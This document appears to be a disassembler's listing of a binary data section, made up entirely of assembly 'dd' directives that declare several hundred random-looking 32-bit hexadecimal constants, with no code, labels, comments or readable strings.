		dd 0EF8B0ADFh, 0DAD5FB83h, 4BFF1FC1h, 375E5A58h, 0D239E0E6h
		dd 0B658A3D0h, 95942BEDh, 59811EF5h, 5152922Dh,	0B66BAB4Ah
		dd 28FBE7FCh, 6571DF4Bh, 5878F4E6h, 3E1663Fh, 0FDD48E67h
		dd 9C96B940h, 0ED5522FCh, 846F761Ch, 323558CAh,	0B02AB2C5h
		dd 13FDE574h, 5CAFA94Eh, 6FE15D82h, 6776E569h, 9F5115D7h
		dd 0AEADFD5Fh, 5300C8A0h, 0BC5ADAD5h, 0FDBB35E3h, 0C1A33518h
		dd 0B00AE81h, 8B7A7FD2h, 647DA7E3h, 4AD1469h, 0FFE265B2h
		dd 5BA30FB5h, 1E8CA1C5h, 32CD3138h, 0EECC9679h,	0DE48F078h
		dd 0FFF8F10Dh, 9F8373C5h, 0E6B43881h, 0EF399AFDh, 1E8F6728h
		dd 37FB2DECh, 1F4EBC4Ah, 17F35DD0h, 0B0D5155Bh,	817B5A0Dh
		dd 0FAF9AD9Dh, 95401033h, 0F1982B81h, 0F90E91C3h, 0A9D16D17h
		dd 0AB31B4EBh, 26D63D5Eh, 0FB84603Dh, 0AB54AE92h, 0BFC54251h
		dd 4BFB9AE3h, 325C183Ah, 5C1D46C6h, 0BABEEA83h,	0CB92BB3Eh
		dd 276CB14h, 0E70D60DFh, 0AE17C2DDh, 3FE6C325h,	0B7C587E4h
		dd 45E07D77h, 777364B6h, 25614AC0h, 0A0FED76h, 0A2617464h
		dd 0E81F9D89h, 7F487AE2h, 8CA663D6h, 5573154Eh,	5C81D16Dh
		dd 3BFC554Fh, 0B68D03h,	75259BF5h, 67D1FFD8h, 96BA1E9Dh
		dd 0FB8FACD6h, 0C0996E72h, 0FB37F9AEh, 8FD99DE7h, 13AF402Dh
		dd 4A15D599h, 6F2A7E92h, 3FDA8C12h, 3FFEE27Ah, 0D1CD3834h
		dd 210AB485h, 29EBF29Bh, 7E3FA572h, 0AF2BA42Ch,	0B0FA667Dh
		dd 6BA9D780h, 0E9EC562Fh, 0B31B478Bh, 82213819h, 6FDAB2BBh
		dd 14C168A9h, 0BA98346Dh, 890F45B9h, 0F0AD9D4h,	13889412h
		dd 0D26C9E2Eh, 0E4BFBC52h, 0B329EB2Fh, 8259C371h, 828EA3D6h
		dd 0A2666AA7h, 8E19ABDAh, 9F9F6B3Ah, 0FDCE7F46h, 0B9D30F94h
		dd 7FDAAA21h, 66B8ECE0h, 1D080FA5h, 0EFF7E7D9h,	5AF78C95h
		dd 35BBB877h, 5734502Dh, 0EFF1FEA9h, 6CCB6A58h,	0FBE25701h
		dd 6BFB5581h, 0A5132D1Dh, 89611F55h, 42A3FD48h,	0EEF1EBA4h
		dd 0F5332192h, 0ED483163h, 109C952Bh, 8CC04D03h, 88D3094Eh
		dd 0FA678D59h, 11CEBBD4h, 9FDC40C3h, 0DEADDFFAh, 43176399h
		dd 0C2FAD7Eh, 0AA41011Dh, 530912DDh, 0B3E955BDh, 387861BAh
		dd 21F7C73h, 0AD0CEAE7h, 0B2B1E5CAh, 4579C89Ah,	0C3F1E9D3h
		dd 0E7F46683h, 477435C5h, 0C8B691AEh, 9A029DC9h, 35BBF4FCh
		dd 30BFCA9h, 0D51D0D79h, 927507DBh, 35A95FBAh, 42611B97h
		dd 4C01497Fh, 7C0F195Fh, 13D93D7Ch, 0AF378235h,	3EFD4D58h
		dd 0CE66F8C4h, 8FDA163Bh, 5E628DDDh, 0AECBAF5Ch, 50EA80C8h
		dd 0B276A47Dh, 394FFC19h, 6E61579h, 2CD6F7BFh, 40C2ED8Fh
		dd 9401C15Fh, 4AC0CACBh, 0DE961A61h, 9B0772DFh,	0A664D406h
		dd 61DE117Dh, 0D09DFA76h, 332B8FB4h, 88AE915Fh,	0C7F22D93h
		dd 584A44B6h, 568C3B97h, 0A456E975h, 9E5CCE7Dh,	94538E56h
		dd 0D2B2C7D8h, 0B01BFD75h, 0A25AD65Eh, 0D4077835h, 2AAFA27Eh
		dd 55E9BA23h, 1C59F42Dh, 0A47E1C1Eh, 0B8DC72B2h, 16C70782h
		dd 7E72798Dh, 333DDE9Fh, 0B4ABCF9Fh, 6C945B72h,	9689E64Fh
		dd 0D3D64323h, 239C95CEh, 0ED557A76h, 3FD5C82Dh, 1DF3C23Bh
		dd 0CC3F3DA6h, 5F0F208Ch, 8A4E27BDh, 0DD0F9986h, 9DE116Bh
		dd 0B941B6B9h, 6AAD70D5h, 0A2E4ED12h, 6D0D666Ch, 2B3717F0h
		dd 0DAE4B360h, 5F37969Eh, 9703CB29h, 0E6C4C518h, 3A25B9C1h
		dd 0EF945F68h, 4E66D0E7h, 6390928Dh, 0B25B4F9Fh, 6BCFEE78h
		dd 0FCE8F2FFh, 0DB9D9272h, 75DAD508h, 4F653D74h, 0CB4592E6h
		dd 0BBB8160Bh, 99C6D19h, 15749554h, 0D17CABE5h,	30A14812h
		dd 3B4B75D2h, 0C0FABC75h, 1FBE9BF8h, 0EE35E0FCh, 0AD538BFh
		dd 239912ABh, 0CD1775A8h, 89270F99h, 0DA488BD3h, 0CEB4A631h
		dd 3B74EFD5h, 2D1E3F05h, 0B56D47DBh, 52FF6228h,	7487EDFh
		dd 483D945h, 0CBCAEF73h, 2D94368h, 0A93FE1D5h, 0D1BEC7EEh
		dd 9746BF8Ah, 0B730C7F9h, 2AEAE0DCh, 2CE4A8D5h,	0E97CCFD9h
		dd 0A4E0EDA3h, 0D4BF72AFh, 4AAC73D5h, 573B6877h, 82AFFF53h
		dd 90C47335h, 2D5A3509h, 0F9D63F0Ch, 1E62D062h,	0F9B18847h
		dd 0CA17BED0h, 6B8B2D32h, 0D1AEFC57h, 0E71CF813h, 3065FBADh
		dd 0C6781F6Ch, 60637E72h, 0BDDC8E27h, 90DF7DF0h, 0D9EC1693h
		dd 0A4A96078h, 0C2FA5693h, 5CEEBBB7h, 7A9FEB3Dh, 83339CDAh
		dd 907C1D4Bh, 0E5E96564h, 0D1DF5056h, 0A82DAD82h, 73568C50h
		dd 214DCF11h, 28242E2Bh, 22D5F3BAh, 66D45D0Ch, 37719DDDh
		dd 299C81DBh, 82B4C2FFh, 8C668BE3h, 62AE4BA4h, 57FAB46Fh
		dd 5A8EE48Bh, 54E0D65Eh, 2148BD43h, 38DC0DDCh, 764AF53Bh
		dd 0E092097Bh, 0F842D35Fh, 0F988AB3h, 1700A5F2h, 4B92C6D4h
		dd 973D5955h, 2BB8DE2Ah, 6371B9A2h, 0E7AC18B5h,	57EBC499h
		dd 55D08F1Bh, 21243A1Eh, 5FC7D88Bh, 7C14A84Eh, 1D9BD91Fh
		dd 6DF0F8ADh, 0DD235CB9h, 638C3EE9h, 6B3EA382h,	88D19AFBh
		dd 0E8C4BCE8h, 0EEEDD488h, 58BA1DD7h, 1B9D2D17h, 0B085810Ah
		dd 0C36471F0h, 36AA9182h, 8E449011h, 0F04EA89Ah, 0D1C272A4h
		dd 0DC1680B2h, 5E57F1CEh, 0FA1B8F41h, 0F615CD9Ch, 0F85BDCAFh
		dd 1ACBBBB4h, 72D5B17Ch, 28AAE463h, 226022CAh, 2A333075h
		dd 298A0C33h, 24ABBF1Ah, 9E6255FAh, 8265DC65h, 0B4B09D63h
		dd 74BF8BF8h, 4AC92D9Ch, 185A0B87h, 0D8D7AADh, 0A6526B23h
		dd 1C65BC3Bh, 4A57968Fh, 0C5BF59B1h, 22545DD5h,	0D5218C8h
		dd 0A2FC67FEh, 2C4514BEh, 0D71B9AE2h, 84E7160Dh, 0A59683CEh
		dd 0FBDE7170h, 0E3F8EA8Eh, 0BBE63B3Bh, 34FD6ED4h, 75FD36D2h
		dd 0EBAE0010h, 0CC95BE6Ah, 0E3775D7Bh, 23AE7EBEh, 33E04D1Ch
		dd 3865CD79h, 32B50640h, 0C98BF27Eh, 0EA2B0528h, 0BF12E2D0h
		dd 72E6E7FAh, 4D6687E3h, 58C29B3Bh, 0FDA2A5F4h,	0C1F25A4Ch
		dd 1F0D7FF6h, 50D82B38h, 0DB55D3A1h, 0A0E117F8h, 2F7C4860h
		dd 71BF7317h, 47C83543h, 69EFB616h, 9F15B498h, 24A4DE68h
		dd 3171A4D2h, 95188F56h
		dd 16B8F508h, 0C992D738h, 2CC65DF9h, 3B930ACCh,	0DC70248Dh
		dd 0D80D2FB2h, 604DE66Fh, 0DAAF5BABh, 96376FFCh, 0FEB76B20h
		dd 34190B38h, 1CC4225Ah, 758A1A63h, 0E4C08CF1h,	0F19FCAC1h
		dd 7264F6BBh, 0A04E8441h, 40C3EF52h, 6564D99Eh,	5AB20825h
		dd 0F4B93B3Fh, 0A2DFEEA9h, 0FBD09B93h, 5C96E8EAh, 0B23F891Bh
		dd 0B81F2983h, 0C5A67961h, 708F7E12h, 0CE1CA032h, 969F5BF6h
		dd 0F7EB8D0Bh, 0FF407D5Bh, 0D31C7E41h, 6D4698BDh, 0C558AB29h
		dd 69714B39h, 0C5ACB994h, 0A81D3B66h, 0AC3F8ADAh, 0E92C54F9h
		dd 0AD54034Ah, 0A7227626h, 5452CC6Ch, 0B4F16A65h, 156B1202h
		dd 35907B6Ah, 1E2445AAh, 0C394BA2Eh, 6EFB1DA7h,	0E6714E55h
		dd 0B1CC9A5Dh, 0D1B1B997h, 853EE3C0h, 42AF15B3h, 4B346504h
		dd 0E68C6898h, 605B5325h, 0DE65C6CAh, 0A768B171h, 33A97130h
		dd 0CBA96EB2h, 686B7AF0h, 126D4FBAh, 2A1D8AD7h,	1F535449h
		dd 0E44FF577h, 0BBF3E161h, 0FBB3CF6Fh, 0E68E9927h, 0EFD85E3Dh
		dd 0ABE64B34h, 54C1ED25h, 31A455B9h, 0E487628Dh, 0C49B9400h
		dd 0EE2C2BB6h, 6A8E6902h, 0BB0DBCA8h, 910144B2h, 16ECBA2Bh
		dd 9BD71D6Dh, 8D5BB30Ch, 6D301B6Bh, 2C2A7FC9h, 2FC23F2Bh
		dd 37B58F51h, 0FD7EF3F2h, 34306030h, 6DA9EBB9h,	0B297B708h
		dd 99EFC035h, 6846613Ch, 1577D919h, 0E5446617h,	69E187BBh
		dd 0FF6CA2DBh, 0ED7029BEh, 9BEA62EBh, 0FE6CA760h, 0BA9E59B8h
		dd 9A948809h, 0B6234AAEh, 7643AA28h, 0A2A52EAAh, 0E6341124h
		dd 29C768F0h, 0DF20B311h, 95416D58h, 0E3B4335Bh, 0D43B43BEh
		dd 4CF7E252h, 0FFD1D266h, 2CF8A895h, 64CAFE39h,	29FADC5Fh
		dd 877B646Bh, 0D97D91F7h, 3EDA616Eh, 8F1CE3B7h,	0D43FF22Ah
		dd 0AC12CCA1h, 47260928h, 0B9A8123Eh, 0DF9ECCCCh, 8B87854Bh
		dd 47576A63h, 53E5E00Ah, 0C6CEDC68h, 968F8DBAh,	432AD5F3h
		dd 0D3A1A42Bh, 60FD071Ch, 0E6687242h, 0A1C4F7F8h, 0B03E7561h
		dd 439A94F8h, 87F33CAEh, 0D10BEF43h, 0D10AFA08h, 6F6ACD42h
		dd 0CE83D8D0h, 0C1918391h, 0C0B1FFFEh, 692705CEh, 4295D689h
		dd 0C984D17Dh, 0F0A2339Fh, 5D3A36A0h, 9FAB59E5h, 99AB097Fh
		dd 0CA03FD3Eh, 0D1435B67h, 0E9A58D42h, 8AB55F9h, 0ACEFBD1h
		dd 9F4B6EBAh, 115505B2h, 0CA3E39E2h, 7FB9CEB4h,	0FD6AE31Fh
		dd 1D773B73h, 0B4660C27h, 8D37631Ah, 0D8F78106h, 8DD6C5FCh
		dd 0C28A33DCh, 760F2383h, 0BECB2A6h, 0BABA4132h, 0F6912FDAh
		dd 3E5FC355h, 0E790FE30h, 0B759A72Eh, 0F1FF4B23h, 6594C226h
		dd 7ED9CD11h, 408CF27Ch, 0E2B017CBh, 1A9A4FD8h,	0B3C1598Bh
		dd 0D272714Ah, 0CA66A24Bh, 0FF284B66h, 0C3AA6DA3h, 0E20C527h
		dd 893CACB0h, 6608A9E2h, 6FABDD75h, 0B323CD1Eh,	8FF06EB9h
		dd 0F85CF7A0h, 54FFE64Fh, 0A2A91F34h, 6B2F0E47h, 0E3E96094h
		dd 0B337DD78h, 0EDCA9662h, 458B50F7h, 0CCD7557Bh, 0D56C37A8h
		dd 0F43FE073h, 0C67EB13Eh, 0A20F0E21h, 1C2CE763h, 168777F1h
		dd 0D648CAEDh, 0C7C6696Ch, 5A13BE46h, 0BD107D9Ah, 0B32D05C3h
		dd 580C658Eh, 4523CC67h, 47803FBEh, 0CC50BF3h, 0AB39C915h
		dd 0C5828962h, 45D30D46h, 0C06CB7Fh, 56AEF3Bh, 69CD53A5h
		dd 0FC2D3CA9h, 0A0602090h, 0D53D36E6h, 5329837h, 0EFD1932Ah
		dd 0BCD08DDAh, 9EC4F5FAh, 0FE187A6Bh, 0B1F06AF8h, 5F4158FAh
		dd 0B5F28E88h, 5F2D17F4h, 5695977Eh, 4B44C4F9h,	1DC4D885h
		dd 237D795Fh, 0E2F988D7h, 0B1629A89h, 5A7DBF9Eh, 1F1BF8EAh
		dd 0E6DE8CEFh, 0EAB9B52Ah, 2D80151Bh, 2CC51FB1h, 7D59CF5h
		dd 27C924B2h, 59988D0Bh, 0DB65FF2Ah, 0EBD14BF3h, 0E38FD091h
		dd 36020AD9h, 4B03CA89h, 4DE9CFBFh, 0FE6DCEBBh,	64F9D3B2h
		dd 3DF3D772h, 0F109ADD1h, 0CE0E6986h, 0D0D5F4Ch, 59438973h
		dd 0FF12C2BEh, 5566FEDCh, 7AC28445h, 361294C7h,	75B462F1h
		dd 0CD09B9E3h, 6095F7E2h, 0DBF7EE98h, 0B83E4C16h, 0B92D30E6h
		dd 568008DBh, 0B1335955h, 0A934E57Dh, 0E29591F0h, 0A605E247h
		dd 0B0F1694Ah, 0BBA8682Fh, 55FC492h, 31A1CEDCh,	954084EAh
		dd 0F78EDC58h, 5955E96Fh, 0B2BA2AC5h, 0B7DDBC2Eh, 0CD1646F7h
		dd 27062579h, 0D742BA9Ch, 5429BC70h, 817F82F8h,	0CD82559Bh
		dd 8148463Bh, 0D557C381h, 0B7CDA43Eh, 0BD4A79F6h, 31874A85h
		dd 0DE58D1A9h, 0C02A3302h, 0F0E663BBh, 0DE702BD0h, 54B4EF65h
		dd 1288720Fh, 0A65071BCh, 9C24F367h, 5139DDB7h,	417405E9h
		dd 53938818h, 64D0960Ch, 57E30535h, 5B56F9F3h, 0BAD1E515h
		dd 4BFF478Eh, 6CE181F1h, 96DDA763h, 0B9189C59h,	0A15C6BDEh
		dd 0EACADD3Fh, 4DB38EB7h, 0ECCAC0FDh, 2D2A44FAh, 52AA9599h
		dd 24D64F9Dh, 56A36A76h, 0E8D307DDh, 0E187D45Eh, 0AF2428BEh
		dd 6BA37408h, 0A04B4D2Eh, 250FAD11h, 266A2519h,	9E8AC743h
		dd 3563E51Ch, 3C5FB1DCh, 78D538B0h, 0E2CF48E0h,	42C2480Eh
		dd 0FD4368EFh, 0B31B5F0Ch, 95E69F0Bh, 0A196CD1Dh, 0E32F7A3Eh
		dd 41F7EC61h, 1F55F763h, 6ABD8C7Dh, 0F92A7517h,	87931B62h
		dd 51E4F68Bh, 0A55AFD73h, 91993D86h, 33F2688h, 0E369838Dh
		dd 2483F6B4h, 451B9890h, 0B3413B12h, 0FC57F0B5h, 0AA2B72D0h
		dd 0F92AD606h, 0B758B9C7h, 5C508A18h, 0C29DD2E7h, 2CC802AAh
		dd 0C92E61ACh, 6CBA5375h, 8217E46Eh, 5ED8822Bh,	568812C9h
		dd 94ADFB20h, 70E1ABEBh, 7E37278Eh, 5B7A7DA8h, 19927D2Eh
		dd 14CF4FDDh, 85D5C373h, 8C45BD2h, 0C5EA4E70h, 1280F35Ah
		dd 0F6AF81A6h, 0BB5A82FEh, 0C6E98FA2h, 0AE500882h, 0CEED525Fh
		dd 280D263Ch, 37C0E906h, 0AA8AAE6Bh, 9BB8B44Eh,	7F43F412h
		dd 62507E0Ah, 0B64A55B8h, 0E04CA80Bh, 759642AEh, 0F7D5B745h
		dd 1DEF94E9h, 0EAA2658Dh, 0B1616BB0h, 0ABEAD03Fh, 6AFED958h
		dd 0D9E2D4E9h, 0DA89175Dh, 105E2E9Ah, 8C3BDF0Eh, 0DC57E71Eh
		dd 2557A07Ch, 934D7EF5h, 8773BE54h, 5FA51985h, 0A71FF75Bh
		dd 0B35C127Fh, 59445C26h, 5574AF5Bh, 0E45AEEE7h, 0FB98C0C9h
		dd 98FED1C5h, 36E6D7DAh, 56672637h, 7BFE52E1h, 0D64BACB3h
		dd 86549BB5h, 77DA6620h, 1508CAF1h, 43F8F46Ch, 897A8D69h
		dd 734F29A0h, 25102024h, 74A2A8EFh, 0B6D3C046h,	50A22C5Eh
		dd 31453EAAh, 2F2ABE56h, 59EB7641h, 446AE67Bh, 703F9689h
		dd 2915C3CBh, 42073FD5h, 0F29FC191h, 6898BFA2h,	95DBC330h
		dd 0BE2BECF3h, 0DAC6E43Fh, 25656F0Dh, 72373715h, 6AB442B4h
		dd 719599AEh, 34253A59h, 4F664EF3h, 0F7FB1897h,	3E6BAB64h
		dd 0C7E36B6Dh, 0EFB30942h, 0BE580506h, 3132CEB2h, 4632176Ah
		dd 0CD0634BBh, 0EC1E0DBDh, 16D92CFFh, 73BF05FCh, 59475655h
		dd 3DB729F7h, 0E99AD00Ch, 4D3BC7Fh, 3157D301h, 532FAB85h
		dd 50B85F98h, 5232C368h, 6DE36129h, 6930FEFCh, 2DB83143h
		dd 0FF3FAA6Dh, 0E4B5B2FFh, 31076BEh, 40A559B0h,	30FE5E35h
		dd 0E8C9AA84h, 0ECAF7464h, 47A048C7h, 287BE175h, 7D3E1DAh
		dd 5949757Ch, 0E9D016C7h, 0B66BA620h, 151F9EEAh, 0B128F34Eh
		dd 657026B5h, 0DFFBAB99h, 0A5D0CAABh, 0A4A46D54h, 718D94D2h
		dd 0C7103362h, 9CB471A6h, 0FB5FC0E9h, 817A4DC9h, 91341A8Ah
		dd 3F176826h, 6DA74B7Ah, 0FB293EC6h, 84CDC206h,	0C4824732h
		dd 0ADB669DEh, 0A82FAF2Bh, 568B3720h, 0B684A9ECh, 7EFC2439h
		dd 0D96AF2E9h, 10390250h, 0FD65ED7Ah, 802C7E07h, 4D08EE0Fh
		dd 0E843F37Eh, 0D81F175Ah, 0DB77D2AFh, 4FCF0C33h, 4F5C7007h
		dd 7CCD7E3Dh, 1B9DA9ADh
		dd 5E9454AAh, 3E519A84h, 7F2681ABh, 43596E44h, 5DB874D9h
		dd 9313252Bh, 0E016A7E1h, 7C7C43E8h, 22A6BF47h,	9AD42A5Ch
		dd 0DB1CC501h, 1C0A317Ch, 0CDCD1AF9h, 5A54428Dh, 0FD4B47Ch
		dd 7591829Bh, 8EEF02CCh, 33FD0DFEh, 98E2F629h, 0DBA51366h
		dd 9B52CB6Fh, 0A462331Ah, 8372AC31h, 943F38CBh,	9FB199EFh
		dd 34F701C7h, 30BE593Eh, 0F666549h, 7971D55Dh, 0B6CE4F0h
		dd 5CC25591h, 45D2519h,	9F81BE79h, 0E4FAB34Bh, 58C0EFE9h
		dd 519D8D98h, 37DDF5CCh, 98B40D52h, 15857541h, 0C3D24DAAh
		dd 26235596h, 4DCBC7A9h, 0D955E6FDh, 2BEF74D5h,	5824155Ch
		dd 6E7B0F5Ch, 59A4BFA4h, 7EFBB7AEh, 17CC48D0h, 4996576Dh
		dd 730B94C6h, 1BDA3746h, 75BD512Eh, 0E1F4D1A3h,	3460F1F7h
		dd 60B2188Ch, 0ACB3101Fh, 0A87AB475h, 97D22EEAh, 0C4962639h
		dd 0BB6614FCh, 0D1878A3Ch, 0F58CEA93h, 0A99681E6h, 4ED79103h
		dd 0E98B9A61h, 12A135BAh, 432949A6h, 57244056h,	157617F4h
		dd 0CEED79F5h, 2D8D7D6Ah, 9667BA51h, 26F0CBB2h,	5ED18BE9h
		dd 74E93E2Dh, 0F3FF3F5h, 92EAD5FCh, 6D54C99Dh, 23C0566Ch
		dd 3EF33CEEh, 0DD791292h, 1E324866h, 6105346Ch,	0EE6CACCBh
		dd 680F9D6Bh, 0F7E96C9Fh, 7E33A38Dh, 8E79C315h,	42DFAFEFh
		dd 99218B95h, 0A3687394h, 0F81F31E4h, 0E1D448F8h, 7851967Fh
		dd 0EFFCDC70h, 5578D024h, 6179E37Ah, 73603509h,	1E5E8BB0h
		dd 0A3D32678h, 2F15CEA3h, 0EB89BABDh, 3CB10B46h, 0A3ABE82Fh
		dd 8713755Dh, 606DFDC1h, 7FEBE7C5h, 3FE56E54h, 0FA91B14Eh
		dd 49893886h, 81D9BFBBh, 0C3B59956h, 3CBE5763h,	7F51126Ch
		dd 0DF2347C8h, 37116A29h, 64259EB6h, 5A34DFE8h,	0B166AA8Ch
		dd 6E4AB8FFh, 645CD90Ch, 0A572CD5Ch, 8CDEB94Dh,	1E2F42FEh
		dd 0E64CD395h, 0B642F8AAh, 0F5C5AA42h, 0F2DB7BC1h, 77AB977Eh
		dd 6260BD5Eh, 9845F4FFh, 8FB250F2h, 41D53721h, 0FBEFBDBBh
		dd 4817B2E3h, 0DEF0B3h,	0AF979F32h, 3DC748E3h, 9DC5C1FDh
		dd 0F41685FCh, 4EF92BAh, 91BC01C9h, 27BD2505h, 548B62B7h
		dd 54D86FE6h, 1831FC69h, 0ABE216B8h, 0D57BF9Bh,	0E1D2FD4Dh
		dd 0CB9E40C2h, 0AE58A677h, 0D696C3D4h, 9D45543h, 4F553F91h
		dd 8CBB561Eh, 0A7D5B3E9h, 696DA11Eh, 0ABC4728Bh, 6A8329CBh
		dd 3262D295h, 0B2D4975Dh, 4FB6911Dh, 12AB99BBh,	5517AD7Bh
		dd 5EB47925h, 169F167Ah, 0F060C0E5h, 0DF56251Fh, 2B2F78FEh
		dd 0A2C76A51h, 0F7965F66h, 7B1A738Dh, 0CF53F6Fh, 0EF3B46AEh
		dd 0C3B85671h, 75D79628h, 65E03B4Eh, 20FF2304h,	0EA8382F9h
		dd 0BF166580h, 0C2F7E27Bh, 0EF4686Bh, 0EE4F81CFh, 8F86497Eh
		dd 9885CCC1h, 9FED9573h, 0E72C40C8h, 60D1F58Fh,	23525865h
		dd 0C42514EAh, 0C1F6306Ch, 7F5CB3ADh, 0D198C7A2h, 0D8BC0F8Ah
		dd 0C55E8AE9h, 2B81A8D6h, 208B5C73h, 9BAE6991h,	0D4DEB7E0h
		dd 0C0157E3Ah, 156E859Eh, 7E6892EEh, 7FB9D53Fh,	99579ECh
		dd 66C555EDh, 0F2AE379Ah, 0C992AA61h, 9A33AB13h, 0F06F761Dh
		dd 70D0F3FBh, 5D87253Ch, 0D605F5AAh, 0D633D2B7h, 0B506B23Ch
		dd 0DD2EC81Ch, 7B19504Dh, 29461B60h, 3BE68C6Fh,	0D6D61557h
		dd 0FCC4FE94h, 72EBC62Bh, 803D8DC6h, 0EB33A05Bh, 0D6DFF868h
		dd 540AB044h, 858C3D45h, 2B85CDAFh, 0A75A56C4h,	0BBD93161h
		dd 2E7A23D5h, 9F7A5AFCh, 0ADA4E180h, 0A50E6537h, 59257DCBh
		dd 0D24371D7h, 0E0214FEFh, 5CCF81F9h, 3D03B3BEh, 0C27586D3h
		dd 0E4986340h, 98BF6213h, 62B5CD31h, 0A550D1EEh, 15CA76D4h
		dd 81BF1C48h, 0DFAE47F5h, 35E36B06h, 0B28C7A9Dh, 0D06CEAD4h
		dd 16675E5Dh, 0ACF11F56h, 0D0C86773h, 90BF30AEh, 0F7E14402h
		dd 6CCB4829h, 15733FC7h, 7E38A78h, 6075116Ch, 0FF94C6E8h
		dd 0F4D3FF26h, 0CD837ACBh, 0D7D6123Eh, 0AA87038Eh, 0A857D259h
		dd 6B6AD5EEh, 0DBB9F51Eh, 0ABF737F7h, 0AC0E76FAh, 950CF0D3h
		dd 0CA95D705h, 0B2E0C6BFh, 557B976Ch, 0C162F222h, 0DA1C4796h
		dd 289FEB57h, 0BE653B3Fh, 0E50060BFh, 4BED34E6h, 589BC307h
		dd 24363C74h, 566D4B24h, 90BA6288h, 0F77C2E62h,	0FF242312h
		dd 0CC528542h, 0FE4F57F1h, 3095B168h, 0E1E13B99h, 8FCA2BEFh
		dd 0DBD44C11h, 27F8288Ch, 754D0B7Ah, 571CBDA9h,	5A735C8Ch
		dd 6CE6DD51h, 0E767696Fh, 0F8E53225h, 8D9001B4h, 722596DBh
		dd 10E5556Dh, 5BBF363h,	788DF8F4h, 40AB45F8h, 0F729FCC2h
		dd 22122DC5h, 8F70E3F2h, 3C8FF8E1h, 30916F7Fh, 88B90174h
		dd 16F555ECh, 0D096C83Bh, 0A7DCFCAFh, 34AB3D7Eh, 0E7BC1A0Fh
		dd 0EAFAFCEEh, 52F4F5A3h, 1D8ED8C2h, 32B74C6Eh,	0E827D95Dh
		dd 533930DFh, 0C8AE46D0h, 76DAC351h, 0CCB578C3h, 0FB519406h
		dd 1C3E2051h, 676AC822h, 0D8EB7785h, 58C99E59h,	2E273405h
		dd 5A3C6BECh, 36D1F75Dh, 7E6948BEh, 0C4BEB9A9h,	0CE32E103h
		dd 0CAC08DA7h, 0BBABB312h, 476021D0h, 0FEBB1E8h, 0CF2B7EACh
		dd 0C1790FE7h, 0F5855694h, 0EE5AC427h, 0D7F620Eh, 800E2356h
		dd 582699D8h, 5F4F7BE5h, 81F22F49h, 7D3D3F93h, 0D95E0082h
		dd 80F5D839h, 0BB70ABFBh, 0BFCA6EFCh, 1883F782h, 481EED4Bh
		dd 0AAA03AD9h, 4B6DDA16h, 535582DCh, 0AE40D955h, 0B47C6AA2h
		dd 2748ED51h, 7CEB7497h, 0DE5DAADDh, 6E5CA72Dh,	47671CADh
		dd 58828705h, 2C9FBD8Ch, 0DEBF3D05h, 0EBD6FBA1h, 773C3E88h
		dd 8762C11Bh, 0AAC5F315h, 0E1877CC8h, 79CC3A7Eh, 0A7080F68h
		dd 50DD6AB5h, 7109E00Ch, 1F7E372Bh, 18F4FE46h, 5BFD261Fh
		dd 0C0FDA123h, 0FC6D6784h, 53F1F518h, 59C03594h, 1790859Ah
		dd 2EE1C271h, 0CA465A17h, 6CE1CA16h, 4B13303Ch,	2E9BF87Fh
		dd 0EF2806AFh, 72F9FA4Dh, 30BCD4CDh, 695ED1C5h,	5123FA0Dh
		dd 7ED9AEA2h, 0EB9DB5F5h, 8A8F8FC6h, 0F66082F7h, 0EA6ACA8Eh
		dd 0C4B3BC2h, 0FA3937D4h, 0E792503h, 0AA40C12Fh, 0EFD45580h
		dd 2EE69DFEh, 0C2A19EC4h, 0F1601303h, 75CE9487h, 8F846BECh
		dd 0A9C6F49Ch, 65FD2C4Bh, 54A07A40h, 0CF1BA27Ch, 629F6863h
		dd 0D6D844CCh, 56ADE8Fh, 73DD60D9h, 36EFD6EFh, 28BCBA47h
		dd 0A491A909h, 78AD93A7h, 0E07C1934h, 4D3D43FFh, 0C456766Eh
		dd 0C49DDD03h, 0B2ADDB6Bh, 0CFD8CE6h, 29DDAF05h, 0CF33B03Eh
		dd 1DE36E91h, 53B0586h,	70D454D7h, 0E6A09909h, 6053A16Bh
		dd 2EDE5175h, 0E8581ACEh, 622BA26Dh, 0A7162C91h, 0F194FDA4h
		dd 0E82839C1h, 397E76BDh, 5575E1DAh, 0B2172A57h, 9FED674Dh
		dd 7BA31879h, 0FBAF6598h, 170FEF90h, 559725D9h,	86BAC236h
		dd 3F28FF3Ah, 3958CA30h, 0C0514473h, 0ABDA5D7Ah, 0DADAC3B8h
		dd 62352652h, 5265E735h, 8B510AACh, 12AB463Ah, 1F1780B7h
		dd 82B97FD6h, 32F60452h, 0EB4BB965h, 0CB31D5C9h, 3C71EA33h
		dd 0AF75F157h, 81E416C6h, 367B2ABDh, 893DC8A1h,	9968F3C1h
		dd 49B6A767h, 31312D54h, 4B44A879h, 0A0C4B31Eh,	2A98A736h
		dd 0C8439F1Ch, 0C833FD60h, 2541F0DDh, 0EBF9FD27h, 99988F74h
		dd 5AE5E75h, 2A2222C3h,	0D02EEB95h, 2B429D06h, 54F56455h
		dd 5054A7E1h, 0D9E6EAABh, 7F256B80h, 75D82FE9h,	6A414AD1h
		dd 1F3B5D3Ah, 0E33156CBh, 0AB8AB02Fh, 497DE6FBh, 7A4F9A66h
		dd 0DA29F85Bh, 5162ADB1h, 0CB1C9E56h, 38CC505Ah, 59C98607h
		dd 32AE435Eh, 1DDE31D9h, 2CC8B97Dh, 0D8B8540Fh,	8C6F3243h
		dd 238A22BAh, 0D1893106h, 0DE9407F2h, 91D2AFB7h, 44A933A1h
		dd 8AF8519h, 0B0E42E06h
		dd 0E4A0DD35h, 0B03FBF9Dh, 0BF35F151h, 24EF3F8Ch, 5CBB7554h
		dd 2B6CF5C2h, 1595A2AFh, 0A66F12D5h, 7CFB706Dh,	1EB585B9h
		dd 23D8AC81h, 8661D4AFh, 0FA2A234Ah, 665F8BA6h,	8523987Ah
		dd 0E07EA6BEh, 275F18B4h, 0F6F3D098h, 2D5C28BAh, 0F8733BF9h
		dd 44B14ABBh, 259D8BBBh, 80A32FD7h, 0B7CE021Fh,	195ABDC1h
		dd 56735273h, 1E676DCCh, 0A7C98CCEh, 80BBF731h,	0D34857ACh
		dd 1BBD4F5Eh, 0E3AEF7D9h, 0FBAB5457h, 55E8C16Ah, 94DF52AAh
		dd 74B06C6Ch, 0DAFD1E8Bh, 4EE944DDh, 9F04A360h,	0CAAA3902h
		dd 9695C2B2h, 0E9CE2FBCh, 0BF287AF2h, 9A550AF9h, 0F275BFE7h
		dd 0F5956EEAh, 15F03BA5h, 5FA3C8E8h, 853AF174h,	0E43AFB94h
		dd 0A364F10Eh, 0D6D172CAh, 0C4FE8104h, 0F9DA9934h, 0FDE667Eh
